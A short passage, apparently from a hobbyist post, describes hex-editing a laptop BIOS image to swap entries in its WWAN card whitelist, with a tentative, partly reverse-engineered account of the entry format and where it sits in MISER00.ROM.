Now, I’m sure there are more devices in the whitelist, but for safety reasons, the ones I choose are 1) WWAN cards (I don’t want to accidentally remove the camera from the whitelist), and 2) in the Linux VID/PID list. If this doesn’t work, then try looking and replacing some more values in the whitelist. Although I haven’t completely reversed the whitelist format yet, I THINK it’s something like this. 1 Byte: FA followed by 4 bytes VID (little-endian) followed by 4 bytes PID (little-endian) followed by X bytes of don’t-know-what. The offset is different for every BIOS version, but it’s always in MISER00.ROM and is before DB 0B 00 19 and a bit after a bunch of 00s.